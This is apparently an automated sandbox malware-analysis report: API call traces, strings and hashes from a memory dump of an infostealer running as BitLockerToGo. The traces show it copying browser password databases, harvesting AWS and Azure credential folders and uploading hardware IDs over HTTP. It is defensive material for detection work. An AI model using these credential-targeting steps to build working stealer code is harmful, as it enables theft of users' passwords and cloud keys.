                                                                                                                                                                                                                                                                                                                                                          • CopyFileA.KERNEL32(?,?,00000001), ref: 02A0981D
                                                                                                                                                                                                                                                                                                                                                          • PathFileExistsA.SHLWAPI(?), ref: 02A09828
                                                                                                                                                                                                                                                                                                                                                          • Sleep.KERNEL32(000003E8), ref: 02A09837
                                                                                                                                                                                                                                                                                                                                                          • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 02A0989A
                                                                                                                                                                                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 02A098B0
                                                                                                                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000000), ref: 02A098C7
                                                                                                                                                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 02A098CE
                                                                                                                                                                                                                                                                                                                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02A098E7
                                                                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 02A098FF
                                                                                                                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 02A0990B
                                                                                                                                                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 02A09912
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(00000000,?), ref: 02A09921
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(00000000,02A3833C), ref: 02A0992D
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(00000000,?), ref: 02A09937
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(00000000,_passwords.db), ref: 02A09943
                                                                                                                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,02A0AE7A), ref: 02A0997A
                                                                                                                                                                                                                                                                                                                                                          • RtlFreeHeap.NTDLL(00000000), ref: 02A09981
                                                                                                                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 02A0998C
                                                                                                                                                                                                                                                                                                                                                          • RtlFreeHeap.NTDLL(00000000), ref: 02A09993
                                                                                                                                                                                                                                                                                                                                                          • DeleteFileA.KERNEL32(?), ref: 02A0999C
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357729051.0000000002A31000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A3E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A64000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A8D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A9F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AE6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002B9A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002C41000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3358124521.0000000002C53000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Heap$Filelstrcat$Processlstrcpy$AllocateFree$CloseCopyCreateDeleteExistsHandlePathReadSizeSleepSystemTimelstrlen
                                                                                                                                                                                                                                                                                                                                                          • String ID: _passwords.db
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3315713884-1485422284


                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A121A5: lstrlen.KERNEL32(?,?,02A19098,02A377FE,02A37787,?,?,?,?,02A19D6E), ref: 02A121AB
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A121A5: lstrcpy.KERNEL32(00000000,00000000), ref: 02A121DD
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12143: lstrcpy.KERNEL32(00000000,00000000), ref: 02A12169
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A18615: StrCmpCA.SHLWAPI(?,ERROR), ref: 02A18669
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A18615: lstrlen.KERNEL32(?), ref: 02A18674
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A18615: StrStrA.SHLWAPI(00000000,?), ref: 02A18689
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A18615: lstrlen.KERNEL32(?), ref: 02A18698
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A18615: lstrlen.KERNEL32(00000000), ref: 02A186B1
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A121E9: lstrcpy.KERNEL32(00000000,?), ref: 02A12219
                                                                                                                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,ERROR), ref: 02A187EF
                                                                                                                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,ERROR), ref: 02A18848
                                                                                                                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,ERROR), ref: 02A188A8
                                                                                                                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,ERROR), ref: 02A18901
                                                                                                                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,ERROR), ref: 02A18917
                                                                                                                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,ERROR), ref: 02A1892D
                                                                                                                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,ERROR), ref: 02A1893F
                                                                                                                                                                                                                                                                                                                                                          • Sleep.KERNEL32(0000EA60), ref: 02A1894E
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          • Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6, xrefs: 02A189FD
                                                                                                                                                                                                                                                                                                                                                          • ERROR, xrefs: 02A188A0
                                                                                                                                                                                                                                                                                                                                                          • sqlite3.dll, xrefs: 02A189B7
                                                                                                                                                                                                                                                                                                                                                          • ERROR, xrefs: 02A18840
                                                                                                                                                                                                                                                                                                                                                          • ERROR, xrefs: 02A18937
                                                                                                                                                                                                                                                                                                                                                          • ERROR, xrefs: 02A188F9
                                                                                                                                                                                                                                                                                                                                                          • sqlite3.dll, xrefs: 02A189EB
                                                                                                                                                                                                                                                                                                                                                          • sqlo.dll, xrefs: 02A18A4D
                                                                                                                                                                                                                                                                                                                                                          • ERROR, xrefs: 02A1890F
                                                                                                                                                                                                                                                                                                                                                          • ERROR, xrefs: 02A187E7
                                                                                                                                                                                                                                                                                                                                                          • ERROR, xrefs: 02A18925
                                                                                                                                                                                                                                                                                                                                                          • Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6, xrefs: 02A18A2E
                                                                                                                                                                                                                                                                                                                                                          • sqlo.dll, xrefs: 02A18A1C
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: lstrlen$lstrcpy$Sleep
                                                                                                                                                                                                                                                                                                                                                          • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6$Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6$sqlite3.dll$sqlite3.dll$sqlo.dll$sqlo.dll
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2840494320-2782864256
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 929efeaf5c7cbc8e4e404ed15c380a3205f075d2f645b97af11062810de7dd63
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 082e46caa6382ec9606fd950a5b2e7d8168924a726c991c54da8ead8d67be52a
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 929efeaf5c7cbc8e4e404ed15c380a3205f075d2f645b97af11062810de7dd63
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0591D871E80228ABEB11FBA4EE46ACCB772BF00750B514561FE05B7160DF75AF098E81

                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 2730 2a01656-2a0168e GetTempPathW 2731 2a01694-2a016bb wsprintfW 2730->2731 2732 2a017f9-2a017fb 2730->2732 2733 2a016c0-2a016e5 CreateFileW 2731->2733 2734 2a017ea-2a017f8 call 2a1e88c 2732->2734 2733->2732 2736 2a016eb-2a0173e GetProcessHeap RtlAllocateHeap _time64 srand rand call 2a25490 WriteFile 2733->2736 2736->2732 2740 2a01744-2a0174a 2736->2740 2740->2732 2741 2a01750-2a0178c call 2a25490 CloseHandle CreateFileW 2740->2741 2741->2732 2744 2a0178e-2a017a1 ReadFile 2741->2744 2744->2732 2745 2a017a3-2a017a9 2744->2745 2745->2732 2746 2a017ab-2a017e1 call 2a25490 GetProcessHeap RtlFreeHeap CloseHandle 2745->2746 2746->2733 2749 2a017e7-2a017e9 2746->2749 2749->2734
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • GetTempPathW.KERNEL32(00000104,?), ref: 02A01686
                                                                                                                                                                                                                                                                                                                                                          • wsprintfW.USER32 ref: 02A016AC
                                                                                                                                                                                                                                                                                                                                                          • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000100,00000000), ref: 02A016D6
                                                                                                                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000008,000FFFFF), ref: 02A016EE
                                                                                                                                                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 02A016F5
                                                                                                                                                                                                                                                                                                                                                          • _time64.MSVCRT ref: 02A016FE
                                                                                                                                                                                                                                                                                                                                                          • srand.MSVCRT ref: 02A01705
                                                                                                                                                                                                                                                                                                                                                          • rand.MSVCRT ref: 02A0170E
                                                                                                                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 02A0171E
                                                                                                                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,00000000,000FFFFF,?,00000000), ref: 02A01736
                                                                                                                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 02A01753
                                                                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 02A01761
                                                                                                                                                                                                                                                                                                                                                          • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,04000100,00000000), ref: 02A0177D
                                                                                                                                                                                                                                                                                                                                                          • ReadFile.KERNEL32(00000000,00000000,000FFFFF,?,00000000), ref: 02A01799
                                                                                                                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 02A017AE
                                                                                                                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02A017B8
                                                                                                                                                                                                                                                                                                                                                          • RtlFreeHeap.NTDLL(00000000), ref: 02A017BF
                                                                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 02A017CB
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: FileHeap$_memset$CloseCreateHandleProcess$AllocateFreePathReadTempWrite_time64randsrandwsprintf
                                                                                                                                                                                                                                                                                                                                                          • String ID: %s%s$delays.tmp
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1620473967-1413376734
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 3be7a9274b281273c9931ab62b20318207864dbdb30b0a36933b08a2fc01fc97
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: ec9f35bd4d05967891944443cb66ed78c0b82f256dcc8c7f35cfe8ba0432a396
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3be7a9274b281273c9931ab62b20318207864dbdb30b0a36933b08a2fc01fc97
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EB4171B1D40258ABDB205B71AC8DFEB7B7DEB89715F0009A9B50DE1081DF319965CE60
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12175: lstrcpy.KERNEL32(00000000,?), ref: 02A12194
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A049DE: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 02A04A10
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A049DE: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 02A04A16
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A049DE: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 02A04A1C
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A049DE: lstrlen.KERNEL32(000000FF,00000000,?), ref: 02A04A2E
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A049DE: InternetCrackUrlA.WININET(000000FF,00000000), ref: 02A04A36
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12143: lstrcpy.KERNEL32(00000000,00000000), ref: 02A12169
                                                                                                                                                                                                                                                                                                                                                          • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 02A04AF5
                                                                                                                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?), ref: 02A04B13
                                                                                                                                                                                                                                                                                                                                                          • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 02A04CAB
                                                                                                                                                                                                                                                                                                                                                          • HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 02A04CEF
                                                                                                                                                                                                                                                                                                                                                          • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 02A04D1D
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrlen.KERNEL32(?,?,?,02A18FD9,abc_,00000000,02A37786,?,?,?,?,02A19D6E), ref: 02A12279
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrcpy.KERNEL32(00000000,?), ref: 02A122A1
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrcat.KERNEL32(?,00000000), ref: 02A122AC
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A121E9: lstrcpy.KERNEL32(00000000,?), ref: 02A12219
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12223: lstrcpy.KERNEL32(00000000,?), ref: 02A12251
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12223: lstrcat.KERNEL32(?,?), ref: 02A1225B
                                                                                                                                                                                                                                                                                                                                                          • lstrlen.KERNEL32(?,02A37A2B,",build_id,02A3898C,------,02A38980,",hwid,02A3896C,------), ref: 02A05016
                                                                                                                                                                                                                                                                                                                                                          • lstrlen.KERNEL32(?,?,00000000), ref: 02A05029
                                                                                                                                                                                                                                                                                                                                                          • HttpSendRequestA.WININET(00000000,?,00000000), ref: 02A05037
                                                                                                                                                                                                                                                                                                                                                          • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 02A05094
                                                                                                                                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 02A0509F
                                                                                                                                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(?), ref: 02A050B6
                                                                                                                                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(?), ref: 02A050C2
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileOptionReadSend
                                                                                                                                                                                                                                                                                                                                                          • String ID: "$"$------$------$------$build_id$hwid
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3006978581-3960666492
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 00c3eb3d54391e412db9ddb6eb95923f552726fc852a14ba1468cb04013ae416
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 75b4fb82706ad39c882bd181aab86d4eb2c632711a5c17ba4c185abb6f8edc9f
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 00c3eb3d54391e412db9ddb6eb95923f552726fc852a14ba1468cb04013ae416
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 43029E31D9512A9ADB21EB21EE45B9DB3B6FF04350F0544E1AA4873164CE75AF8A8FC0
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 02A1346A
                                                                                                                                                                                                                                                                                                                                                          • CoInitializeEx.COMBASE(00000000,00000000), ref: 02A1347B
                                                                                                                                                                                                                                                                                                                                                          • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 02A1348C
                                                                                                                                                                                                                                                                                                                                                          • CoCreateInstance.COMBASE(02A33F70,00000000,00000001,02A33EA0,?), ref: 02A134A6
                                                                                                                                                                                                                                                                                                                                                          • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 02A134DC
                                                                                                                                                                                                                                                                                                                                                          • VariantInit.OLEAUT32(?), ref: 02A13537
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A133B3: __EH_prolog3_catch.LIBCMT ref: 02A133BA
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A133B3: CoCreateInstance.COMBASE(02A34220,00000000,00000001,02A3C17C,?), ref: 02A133DD
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A133B3: SysAllocString.OLEAUT32(?), ref: 02A133EA
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A133B3: _wtoi64.MSVCRT ref: 02A1341D
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A133B3: SysFreeString.OLEAUT32(?), ref: 02A13436
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A133B3: SysFreeString.OLEAUT32(00000000), ref: 02A1343D
                                                                                                                                                                                                                                                                                                                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 02A13566
                                                                                                                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 02A13572
                                                                                                                                                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 02A13579
                                                                                                                                                                                                                                                                                                                                                          • VariantClear.OLEAUT32(?), ref: 02A135B8
                                                                                                                                                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 02A135A5
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12143: lstrcpy.KERNEL32(00000000,00000000), ref: 02A12169
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: String$CreateFreeHeapInitializeInstanceTimeVariant$AllocAllocateBlanketClearFileH_prolog3_catchH_prolog3_catch_InitProcessProxySecuritySystem_wtoi64lstrcpywsprintf
                                                                                                                                                                                                                                                                                                                                                          • String ID: %d/%d/%d %d:%d:%d$InstallDate$ROOT\CIMV2$Select * From Win32_OperatingSystem$Unknown$Unknown$Unknown$WQL
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2464074849-461178377
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 02A18231
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A13A18: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 02A13A59
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(?,00000000), ref: 02A18250
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(?,\.azure\), ref: 02A1826D
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A17D20: wsprintfA.USER32 ref: 02A17D67
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A17D20: FindFirstFileA.KERNEL32(?,?), ref: 02A17D7E
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A17D20: StrCmpCA.SHLWAPI(?,02A37AF4), ref: 02A17D9F
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A17D20: StrCmpCA.SHLWAPI(?,02A37AF8), ref: 02A17DB9
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A17D20: wsprintfA.USER32 ref: 02A17DE0
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A17D20: StrCmpCA.SHLWAPI(?,02A376B6), ref: 02A17DF4
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A17D20: wsprintfA.USER32 ref: 02A17E11
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A17D20: PathMatchSpecA.SHLWAPI(?,?), ref: 02A17E3E
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A17D20: lstrcat.KERNEL32(?), ref: 02A17E74
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A17D20: lstrcat.KERNEL32(?,02A37B10), ref: 02A17E86
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A17D20: lstrcat.KERNEL32(?,?), ref: 02A17E99
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A17D20: lstrcat.KERNEL32(?,02A37B14), ref: 02A17EAB
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A17D20: lstrcat.KERNEL32(?,?), ref: 02A17EBF
                                                                                                                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 02A182A5
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(?,00000000), ref: 02A182C7
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(?,\.aws\), ref: 02A182E4
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A17D20: wsprintfA.USER32 ref: 02A17E28
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A17D20: CopyFileA.KERNEL32(?,?,00000001), ref: 02A17F78
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A17D20: DeleteFileA.KERNEL32(?), ref: 02A17FEC
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A17D20: FindNextFileA.KERNEL32(?,?), ref: 02A1804E
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A17D20: FindClose.KERNEL32(?), ref: 02A18062
                                                                                                                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 02A18319
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(?,00000000), ref: 02A1833B
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(?,\.IdentityService\), ref: 02A18358
                                                                                                                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 02A1838D
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: lstrcat$File_memsetwsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                                                                                                                                                                                                                                                                                                                                          • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12143: lstrcpy.KERNEL32(00000000,00000000), ref: 02A12169
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A138A6: GetSystemTime.KERNEL32(?,02A37807,?), ref: 02A138D5
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrlen.KERNEL32(?,?,?,02A18FD9,abc_,00000000,02A37786,?,?,?,?,02A19D6E), ref: 02A12279
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrcpy.KERNEL32(00000000,?), ref: 02A122A1
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrcat.KERNEL32(?,00000000), ref: 02A122AC
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12223: lstrcpy.KERNEL32(00000000,?), ref: 02A12251
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12223: lstrcat.KERNEL32(?,?), ref: 02A1225B
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A121E9: lstrcpy.KERNEL32(00000000,?), ref: 02A12219
                                                                                                                                                                                                                                                                                                                                                          • CopyFileA.KERNEL32(?,?,00000001), ref: 02A0BBD3
                                                                                                                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 02A0BCDD
                                                                                                                                                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 02A0BCE4
                                                                                                                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,02A385A4,00000000), ref: 02A0BD95
                                                                                                                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,02A385A8), ref: 02A0BDBD
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(00000000,?), ref: 02A0BDE1
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(00000000,02A385AC), ref: 02A0BDED
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(00000000,?), ref: 02A0BDF7
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(00000000,02A385B0), ref: 02A0BE03
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(00000000,?), ref: 02A0BE0D
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(00000000,02A385B4), ref: 02A0BE19
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(00000000,?), ref: 02A0BE23
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(00000000,02A385B8), ref: 02A0BE2F
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(00000000,?), ref: 02A0BE39
